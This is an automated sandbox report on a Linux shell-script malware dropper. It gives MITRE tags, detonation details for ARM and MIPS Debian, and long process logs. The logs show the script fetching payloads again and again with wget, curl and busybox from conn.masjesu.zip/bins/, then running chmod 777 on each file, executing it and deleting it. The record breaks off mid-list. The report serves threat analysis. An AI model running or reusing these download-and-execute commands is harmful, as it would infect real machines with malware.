Malware Analysis Report

2025-04-03 19:35

Sample ID 241028-c8cjeayfrr
Target 6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
SHA256 6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244
Tags
antivm discovery defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244

Threat Level: Shows suspicious behavior

The file 6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm discovery defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 02:44

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-28 02:44

Reported

2024-10-28 02:47

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

8s

Command Line

[/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Processes

/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh

[/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-28 02:44

Reported

2024-10-28 02:46

Platform

debian9-mipsbe-20240611-en

Max time kernel

111s

Max time network

85s

Command Line

[/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH N/A
N/A /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF N/A
N/A /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG N/A
N/A /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS N/A
N/A /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj N/A
N/A /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c N/A
N/A /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk N/A
N/A /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN N/A
N/A /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v N/A
N/A /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb N/A
N/A /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I N/A
N/A /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 N/A
N/A /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc N/A
N/A /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa N/A
N/A /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 N/A
N/A /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN N/A
N/A /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v N/A
N/A /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb N/A
N/A /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I N/A
N/A /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc N/A
N/A /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa N/A
N/A /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj N/A
N/A /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH N/A
N/A /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF N/A
N/A /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG N/A
N/A /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS N/A
N/A /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c N/A
N/A /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /usr/bin/curl N/A
File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /usr/bin/curl N/A
File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /usr/bin/curl N/A
File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /usr/bin/curl N/A
File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /usr/bin/curl N/A
File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /usr/bin/curl N/A
File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /usr/bin/curl N/A
File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /usr/bin/curl N/A
File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /usr/bin/curl N/A
File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /usr/bin/curl N/A
File opened for modification /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /usr/bin/curl N/A
File opened for modification /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk /usr/bin/curl N/A
File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /usr/bin/curl N/A
File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /usr/bin/curl N/A
File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /usr/bin/curl N/A
File opened for modification /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk /usr/bin/curl N/A
File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /usr/bin/curl N/A
File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /usr/bin/curl N/A
File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /usr/bin/curl N/A
File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /usr/bin/curl N/A
File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /usr/bin/curl N/A
File opened for modification /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /usr/bin/curl N/A
File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /usr/bin/curl N/A
File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /usr/bin/curl N/A
File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /usr/bin/curl N/A
File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /usr/bin/curl N/A
File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /usr/bin/curl N/A
File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /usr/bin/curl N/A

Processes

/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh

[/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/bin/chmod

[chmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH

[./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/bin/rm

[rm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/bin/chmod

[chmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF

[./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/bin/rm

[rm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/bin/chmod

[chmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG

[./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/bin/rm

[rm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/bin/chmod

[chmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS

[./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/bin/rm

[rm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/bin/chmod

[chmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj

[./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/bin/rm

[rm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/bin/chmod

[chmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c

[./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/bin/rm

[rm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/bin/chmod

[chmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk

[./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/bin/rm

[rm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/bin/chmod

[chmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN

[./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/bin/rm

[rm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/bin/chmod

[chmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v

[./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/bin/rm

[rm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/bin/chmod

[chmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb

[./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/bin/rm

[rm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/bin/chmod

[chmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I

[./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/bin/rm

[rm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/bin/chmod

[chmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28

[./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/bin/rm

[rm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/bin/chmod

[chmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc

[./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/bin/rm

[rm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/bin/chmod

[chmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa

[./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/bin/rm

[rm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/bin/chmod

[chmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28

[./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/bin/rm

[rm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/bin/chmod

[chmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN

[./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/bin/rm

[rm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/bin/chmod

[chmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v

[./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/bin/rm

[rm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/bin/chmod

[chmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb

[./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/bin/rm

[rm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/usr/bin/wget

